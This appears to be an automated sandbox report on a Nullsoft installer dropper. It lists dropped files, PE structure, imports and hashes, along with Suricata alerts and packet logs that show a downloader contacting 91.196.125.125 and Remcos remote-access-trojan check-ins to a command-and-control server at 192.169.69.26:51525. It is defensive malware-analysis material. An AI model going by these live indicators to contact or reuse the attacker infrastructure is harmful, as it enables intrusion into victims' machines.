                                      Preview:..v..............j............P.eeeee............N....................nnn........))).....444.........PP.%%%........>>........................FF.............iii..W.....W...................4...`.______......ww.......uuu.&&......................6.......e...........@@......;;... .4........ ...........>>>...............K.C........................>.....................M......;...)))......V.........VV.........%....y.......hh.(................f.......LL...uu.9..z..........\\...eee..............o.33..................AA............~~..C..<........11...'.((((....................dddd....{....AAAA.......]...............................OO.LL...JJJ....8..TTT...y......g............}....."""......11111................""..............XX...........!!!.......XX.xxx..}}}}....u..T.............................................D..^..........................77.(.rr.!............S...ooo.V.......f._.%............................................))......{..;.............dd..||||.........EEEEE...........IIII..XX.W

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\Justifyingly.Mis

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):448873
                                      Entropy (8bit):7.111393709973377
                                      Encrypted:false
                                      SSDEEP:6144:Eb1q3t7HRKlEMrYWov3wxBrt0IAD6vt+F5LshyEVqDoFc+hxgkQQ:wY1KlVY5sOogLshyEUMtn1QQ
                                      MD5:3550BF03E622E28FEF525EE0182339E8
                                      SHA1:0766B2208E92DC0197139EBC305DD136B4E857FE
                                      SHA-256:D1A4CB00AFE4B7B66BDB8D3D31055EF5769877612F34A951278376DAEA93805D
                                      SHA-512:7C0340FBD785741049960324216DD517C664169CCDA9DF98E528EB7BA2EDA662CC28D26361DF7CEA644B21B6912A2554917DBC587980909ABC51AF7F64BFAC3B
                                      Malicious:false
                                      Preview:..e..................R......kk.&.............DDDD............d..%%%......................j............>>..Y........s....j........LLLLLL........].K...6.........WW..A................^^..^^........RRRRRRRR.5.............................w....a..]........*......U..........h...^......TT......................'..uu...............888.....8................................''.A.......~...**.................--..&&......H....==..KK...o.GGG....H...............p..............||.CC.....................www............gggg.7.......Y.....W...............2...///.>.................CC....bb....00...zz...............00.O.[[.H.A.x............................=...............C..................DD...........qqq.G............................33...XXX.....ww....o.....................................C..............N..CC....................vv.........RRR...AAA...n.........(....66..........1...........................L............n...Q.............0................{{{...........}}............................"..........

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\Undedicated119.vit

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):330423
                                      Entropy (8bit):1.2491650618704468
                                      Encrypted:false
                                      SSDEEP:768:Y79V/7OdtU411IL9myi/wAvxcYxq2pDQ4kfWk+MM8AyLAJMu8k/M+UpORLf/zbW+:AmR8uZrxN50Hf9oLa6beGalDQvPbTmeR
                                      MD5:EF4261DCD04F77611A3A1DE40343A71C
                                      SHA1:EB75467B507B7A7F9F452D08A79BB13F428FFBB7
                                      SHA-256:A2F3FBF7C7B9DCF49BB018DE89D1259F2F21F77BBC540FF0DD3BA492CF416E7C
                                      SHA-512:C2CFBBB02D691F9EB2FEB5E3633A6528CC3E5359955EAA1816C33023487E533855E55403B649560AA8580BAE33A682969059CC55C9D446F6B8AB02EAC658ACC9
                                      Malicious:false
                                      Preview:...O..........b.................................................................................C........e..D................................................................................................J...........................U........i......}......................s..............?...............7......................................G.........g.............................e......................!.................................:.......................p....................................s....p.............n..............................S...............................?~.............w.|..m................................p...................................................k..............W..................................X...v....................................,.......................................................>................v1.................................q....................................!............................................................................

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\hand.jpg

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90", progressive, precision 8, 721x800, components 3
                                      Category:dropped
                                      Size (bytes):13421
                                      Entropy (8bit):7.136747769977594
                                      Encrypted:false
                                      SSDEEP:192:L866d5e0AK3IjMPGSvsp8ZJ/NnckKY/Z9rPvxzoHA3ozBt:Ys0PGSQ8TNncE/ZlPJCt
                                      MD5:B358902DF060EB04DA3D7206E2B88672
                                      SHA1:68819B5957EFAC558A1F820DA654776320935574
                                      SHA-256:6807B137577B302E64D2543DF37423B1F68E2D71A0AE4872188CDBB58EA2CFED
                                      SHA-512:9E857FFA049594C298300843733FA1623B5F3D9513B8B002241FAC2654C7C82EBB521BC4D3049174D3B78F5915D475524A5313FA528EC81AFFFAA27EF81174BB
                                      Malicious:false
                                      Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 90....C....................................................................C....................................................................... ...."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d.d"..................................+..S[s~.o.<w.z..,.....A.Y>(.3.Z..D............................K......-r6E._.\...e...l

                                      C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate\naggers.arv

                                      Download File
                                      Process:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):430622
                                      Entropy (8bit):1.250752905027708
                                      Encrypted:false
                                      SSDEEP:1536:CRmfXIjyuE98wkdKqICS5tmiaKMZHiBawc+:f1u+ZUICCm31kDR
                                      MD5:6C0764C7CFB218DBF0ECB687260B0BA1
                                      SHA1:1CA4841BDA7351E92BFBCA3B6952F23EFF8B61B7
                                      SHA-256:AD2B53F491F7294B54DB434ED67867FC6B0C962D987F20918FF0E33A06F53C55
                                      SHA-512:9CB5D6DB23239DAFC1117D1DAEF7978EC528E37094588516B0B93F028352773BC5BCA3C89DBC0E6D8AB728F8BD1C5A6104748B1535C1B83D71A814052DE0373A
                                      Malicious:false
                                      Preview:.P.....................................;.....................................................m.......K.......v..................................]...............................................9.....................................................................d...5.Y...............................................].........C................9...r............................................................................9.................4.......................&@...............}.......................................D..................;...................................t....f............P.X.........................................................dz....e......<................................3...........J........................................................D......................5........D........................................... .........................................>............................>.......x..i........b.................\.".................../.....................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.930916861083211
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      File size:731'660 bytes
                                      MD5:a03dcb82d6ecaab34cc6ae971a806c06
                                      SHA1:3bf367387ad278b154bd2af42e7bedf0f8676f6c
                                      SHA256:4fc786009ad36ded81dfbd863802b06436b718112c35a505d447f6e0d31cbf8d
                                      SHA512:a11a2c0e59cd229d6d8de8edb4322ca434e5931ef94bb1cf4c5435e891125ca8c0518a675277c36936ff47e71eab7954ce17aaa36abb0109cbf84087e9652352
                                      SSDEEP:12288:E3cAEjowqtlkCSN+RgfcWNQDw9HSAcQ4A5uKrQrxco0+tNADhZebeEkOP:E3cAEjowDCC+R7ab9HSzJWoV07fDW
                                      TLSH:96F42311FEA6D8F5E46B64F1993267B58AE3AC68B72173930310B98E3CB3547410F262
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@

                                      File Icon

                                      Icon Hash:981b293d37203cb4

                                      Static PE Info

                                      General

                                      Entrypoint:0x4033d8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:671f2a1f8aee14d336bab98fea93d734

                                      Entrypoint Preview

                                      Instruction
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000224h
                                      push esi
                                      push edi
                                      xor edi, edi
                                      push 00008001h
                                      mov dword ptr [ebp-14h], edi
                                      mov dword ptr [ebp-0Ch], 0040A188h
                                      mov dword ptr [ebp-08h], edi
                                      mov byte ptr [ebp-04h], 00000020h
                                      call dword ptr [0040809Ch]
                                      mov esi, dword ptr [004080A0h]
                                      lea eax, dword ptr [ebp-000000C4h]
                                      push eax
                                      mov dword ptr [ebp-000000B0h], edi
                                      mov dword ptr [ebp-30h], edi
                                      mov dword ptr [ebp-2Ch], edi
                                      mov dword ptr [ebp-000000C4h], 0000009Ch
                                      call esi
                                      test eax, eax
                                      jne 00007F6064AF3F71h
                                      lea eax, dword ptr [ebp-000000C4h]
                                      mov dword ptr [ebp-000000C4h], 00000094h
                                      push eax
                                      call esi
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jne 00007F6064AF3F5Ch
                                      movsx cx, byte ptr [ebp-000000A3h]
                                      mov al, byte ptr [ebp-000000B0h]
                                      sub ecx, 30h
                                      sub al, 53h
                                      mov byte ptr [ebp-2Ah], 00000004h
                                      neg al
                                      sbb eax, eax
                                      not eax
                                      and eax, ecx
                                      mov word ptr [ebp-30h], ax
                                      cmp dword ptr [ebp-000000B4h], 02h
                                      jnc 00007F6064AF3F54h
                                      and byte ptr [ebp-2Ah], 00000000h
                                      cmp byte ptr [ebp-000000AFh], 00000041h
                                      jl 00007F6064AF3F43h
                                      movsx ax, byte ptr [ebp-000000AFh]
                                      sub eax, 40h
                                      mov word ptr [ebp-30h], ax
                                      jmp 00007F6064AF3F36h
                                      mov word ptr [ebp-30h], di
                                      cmp dword ptr [ebp-000000C0h], 0Ah
                                      jnc 00007F6064AF3F3Ah
                                      and word ptr [ebp+00000000h], 0000h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x1a8a8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x430000x1a8a80x1aa0016cf5e27d240800a9470c2103a0eb943False0.849618544600939data7.415748321493681IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x433e80xac96PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9968765560635553
                                      RT_ICON0x4e0800x8b3ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9908545138304438
                                      RT_ICON0x56bc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.39782157676348545
                                      RT_ICON0x591680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4280018761726079
                                      RT_ICON0x5a2100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5522388059701493
                                      RT_ICON0x5b0b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.680956678700361
                                      RT_ICON0x5b9600x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.42378048780487804
                                      RT_ICON0x5bfc80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.45447976878612717
                                      RT_ICON0x5c5300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5718085106382979
                                      RT_ICON0x5c9980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5094086021505376
                                      RT_ICON0x5cc800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5743243243243243
                                      RT_DIALOG0x5cda80x144dataEnglishUnited States0.5216049382716049
                                      RT_DIALOG0x5cef00x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x5cff00x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x5d1100x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x5d1700xa0dataEnglishUnited States0.625
                                      RT_VERSION0x5d2100x358dataEnglishUnited States0.5
                                      RT_MANIFEST0x5d5680x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                      Imports

                                      DLLImport
                                      ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                      ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                      USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                                      GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                                      KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-11-13T08:18:17.236404+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449730TCP
                                      2024-11-13T08:18:54.017024+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.44973691.196.125.12580TCP
                                      2024-11-13T08:18:56.325500+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449738TCP
                                      2024-11-13T08:19:03.195468+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449755192.169.69.2651525TCP
                                      2024-11-13T08:19:03.345502+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449760192.169.69.2651525TCP
                                      2024-11-13T08:19:04.926316+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449765192.169.69.2651525TCP
                                      2024-11-13T08:19:06.827743+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449776192.169.69.2651525TCP
                                      2024-11-13T08:19:06.835426+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449782192.169.69.2651525TCP
                                      2024-11-13T08:19:08.401107+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449784192.169.69.2651525TCP
                                      2024-11-13T08:19:10.382922+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449799192.169.69.2651525TCP
                                      2024-11-13T08:19:10.391282+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449805192.169.69.2651525TCP
                                      2024-11-13T08:19:11.936170+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449810192.169.69.2651525TCP
                                      2024-11-13T08:19:13.772123+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449822192.169.69.2651525TCP
                                      2024-11-13T08:19:13.781011+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449825192.169.69.2651525TCP
                                      2024-11-13T08:19:15.349074+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449830192.169.69.2651525TCP
                                      2024-11-13T08:19:17.218929+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449842192.169.69.2651525TCP
                                      2024-11-13T08:19:17.226763+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449847192.169.69.2651525TCP
                                      2024-11-13T08:19:18.829600+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449853192.169.69.2651525TCP
                                      2024-11-13T08:19:20.612797+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449865192.169.69.2651525TCP
                                      2024-11-13T08:19:20.620211+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449870192.169.69.2651525TCP
                                      2024-11-13T08:19:22.253068+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449876192.169.69.2651525TCP
                                      2024-11-13T08:19:24.028266+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449887192.169.69.2651525TCP
                                      2024-11-13T08:19:24.036167+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449893192.169.69.2651525TCP
                                      2024-11-13T08:19:25.653490+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449899192.169.69.2651525TCP
                                      2024-11-13T08:19:27.445484+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449910192.169.69.2651525TCP
                                      2024-11-13T08:19:27.454454+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449916192.169.69.2651525TCP
                                      2024-11-13T08:19:29.114785+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449922192.169.69.2651525TCP
                                      2024-11-13T08:19:30.896084+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449933192.169.69.2651525TCP
                                      2024-11-13T08:19:30.903882+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449938192.169.69.2651525TCP
                                      2024-11-13T08:19:32.578941+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449944192.169.69.2651525TCP
                                      2024-11-13T08:19:34.374861+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449956192.169.69.2651525TCP
                                      2024-11-13T08:19:34.382169+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449961192.169.69.2651525TCP
                                      2024-11-13T08:19:36.035665+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449966192.169.69.2651525TCP
                                      2024-11-13T08:19:38.188926+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449978192.169.69.2651525TCP
                                      2024-11-13T08:19:38.196639+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.449985192.169.69.2651525TCP
                                      2024-11-13T08:19:39.949409+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449991192.169.69.2651525TCP
                                      2024-11-13T08:19:41.813064+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450001192.169.69.2651525TCP
                                      2024-11-13T08:19:41.820131+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450006192.169.69.2651525TCP
                                      2024-11-13T08:19:43.467073+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450011192.169.69.2651525TCP
                                      2024-11-13T08:19:45.250177+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450022192.169.69.2651525TCP
                                      2024-11-13T08:19:45.257645+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450028192.169.69.2651525TCP
                                      2024-11-13T08:19:46.795133+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450033192.169.69.2651525TCP
                                      2024-11-13T08:19:48.651600+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450043192.169.69.2651525TCP
                                      2024-11-13T08:19:48.660482+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450044192.169.69.2651525TCP
                                      2024-11-13T08:19:50.222483+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450045192.169.69.2651525TCP
                                      2024-11-13T08:19:52.106671+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450046192.169.69.2651525TCP
                                      2024-11-13T08:19:52.115382+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450047192.169.69.2651525TCP
                                      2024-11-13T08:19:53.685122+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450048192.169.69.2651525TCP
                                      2024-11-13T08:19:55.544309+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450049192.169.69.2651525TCP
                                      2024-11-13T08:19:55.552303+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450050192.169.69.2651525TCP
                                      2024-11-13T08:19:57.283983+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450051192.169.69.2651525TCP
                                      2024-11-13T08:19:59.104861+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450052192.169.69.2651525TCP
                                      2024-11-13T08:19:59.112616+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.450053192.169.69.2651525TCP
                                      2024-11-13T08:20:00.760644+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450054192.169.69.2651525TCP
                                      2024-11-13T08:20:02.576299+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450055192.169.69.2651525TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 13, 2024 08:18:53.115622997 CET4973680192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:53.120497942 CET804973691.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:53.120579004 CET4973680192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:53.120764017 CET4973680192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:53.125581026 CET804973691.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:54.016949892 CET804973691.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:54.017024040 CET4973680192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:54.019943953 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:54.019988060 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:54.020066023 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:54.109967947 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:54.109992027 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.046555996 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.046622038 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.117162943 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.117182970 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.117415905 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.117454052 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.121562958 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.167332888 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.402292013 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.402312994 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.402364016 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.402381897 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.402394056 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.402429104 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.525079012 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.525178909 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.552263021 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.552329063 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.675230026 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.675308943 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.702231884 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.702327967 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.798774958 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.798876047 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.852230072 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.852296114 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.922197104 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.922261000 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:55.975267887 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:55.975342989 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.018520117 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.018641949 CET49737443192.168.2.491.196.125.125
                                      Nov 13, 2024 08:18:56.046068907 CET4434973791.196.125.125192.168.2.4
                                      Nov 13, 2024 08:18:56.046149969 CET49737443192.168.2.491.196.125.125
